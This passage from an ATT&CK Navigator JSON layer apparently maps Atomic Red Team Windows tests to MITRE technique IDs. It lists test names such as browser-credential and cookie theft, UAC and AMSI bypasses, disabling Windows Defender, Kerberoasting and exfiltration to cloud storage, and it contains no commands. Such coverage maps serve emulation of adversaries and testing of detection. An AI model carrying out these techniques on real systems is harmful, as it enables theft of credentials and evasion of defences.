New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies 
(Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process 
cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- 
Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable 
UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in 
Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - 
Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n- ESXi - Remove Syslog remote IP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":58,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":10,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n- ESXi - Disable Firewall via Esxcli\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search 
